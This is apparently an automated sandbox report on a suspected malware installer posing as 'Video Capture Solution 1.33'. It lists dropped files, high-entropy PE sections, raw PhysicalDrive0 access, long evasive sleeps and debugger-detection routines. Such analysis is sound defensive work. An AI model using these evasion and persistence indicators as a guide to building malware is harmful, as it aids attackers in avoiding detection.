                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: initial sampleStatic PE information: section where entry point is pointing to: _rste_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rste_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rstf_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rstg_2
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rsth_2
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /4
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /19
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /35
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /51
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /63
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /77
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /89
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /102
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /113
                    Source: is-NF0AU.tmp.1.drStatic PE information: section name: /124
                    Source: is-GSMNO.tmp.1.drStatic PE information: section name: Shared
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rste_2
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rstf_2
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rstg_2
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rsth_2
                    Source: sqlite3.dll.4.drStatic PE information: section name: /4
                    Source: sqlite3.dll.4.drStatic PE information: section name: /19
                    Source: sqlite3.dll.4.drStatic PE information: section name: /35
                    Source: sqlite3.dll.4.drStatic PE information: section name: /51
                    Source: sqlite3.dll.4.drStatic PE information: section name: /63
                    Source: sqlite3.dll.4.drStatic PE information: section name: /77
                    Source: sqlite3.dll.4.drStatic PE information: section name: /89
                    Source: sqlite3.dll.4.drStatic PE information: section name: /102
                    Source: sqlite3.dll.4.drStatic PE information: section name: /113
                    Source: sqlite3.dll.4.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040993C push 00409979h; ret 1_2_00409971
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040A037 push ds; ret 1_2_0040A038
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004941B8 push ecx; mov dword ptr [esp], ecx1_2_004941BD
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004106C8 push ecx; mov dword ptr [esp], edx1_2_004106CD
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00412920 push 00412983h; ret 1_2_0041297B
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00484BE8 push ecx; mov dword ptr [esp], ecx1_2_00484BED
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040D020 push ecx; mov dword ptr [esp], edx1_2_0040D022
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004590F0 push 00459134h; ret 1_2_0045912C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00443438 push ecx; mov dword ptr [esp], ecx1_2_0044343C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00483544 push 00483633h; ret 1_2_0048362B
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040F580 push ecx; mov dword ptr [esp], edx1_2_0040F582
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0047759C push ecx; mov dword ptr [esp], edx1_2_0047759D
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004517CC push 004517FFh; ret 1_2_004517F7
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00451990 push ecx; mov dword ptr [esp], eax1_2_00451995
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045FB44 push ecx; mov dword ptr [esp], ecx1_2_0045FB48
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00419C20 push ecx; mov dword ptr [esp], ecx1_2_00419C25
                    Source: videocapturesolution32.exe.1.drStatic PE information: section name: _rste_2 entropy: 7.746459346219707
                    Source: EShineEncoder.exe.4.drStatic PE information: section name: _rste_2 entropy: 7.746459346219707

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_02DBF8A2
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-VECUS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-AK5QD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeFile created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-MJRUC.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-GSMNO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-NF0AU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\is-U1N6A.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-297HU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-SILBO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_02DBF8A2
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_0040D1AC StartServiceCtrlDispatcherA,4_2_0040D1AC
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C04
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C04
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004241D4 IsIconic,SetActiveWindow,SetFocus,1_2_004241D4
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0042418C IsIconic,SetActiveWindow,1_2_0042418C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_0041837C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_00422854
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00482EF8
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00417590 IsIconic,GetCapture,1_2_00417590
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00417CC6 IsIconic,SetWindowPos,1_2_00417CC6
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CC8
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F110
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60920C91 rdtsc 4_2_60920C91
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B4B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_02DBF9A6
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeWindow / User API: threadDelayed 2647Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeWindow / User API: threadDelayed 7254Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-VECUS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-AK5QD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-MJRUC.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-GSMNO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-46JMK.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-NF0AU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-297HU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\uninstall\is-U1N6A.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-SILBO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Capture Solution 1.33\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5695
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeAPI coverage: 5.5 %
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID: 7152Thread sleep count: 2647 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID: 7152Thread sleep time: -5294000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID: 3900Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID: 3900Thread sleep time: -2220000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID: 7152Thread sleep count: 7254 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe TID: 7152Thread sleep time: -14508000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeThread delayed: delay time: 60000Jump to behavior
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.0000000000A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/g
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.0000000000918000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2973601937.0000000000A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeAPI call chain: ExitProcess graph end nodegraph_0-6735
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeAPI call chain: ExitProcess graph end nodegraph_4-61129
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_4-60821
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60920C91 rdtsc 4_2_60920C91
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DD01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02DD01BE
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DD01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02DD01BE
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DB648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,4_2_02DB648B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DC9528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02DC9528
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00477F98
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_capture_solution_11223Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0042E094 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E094
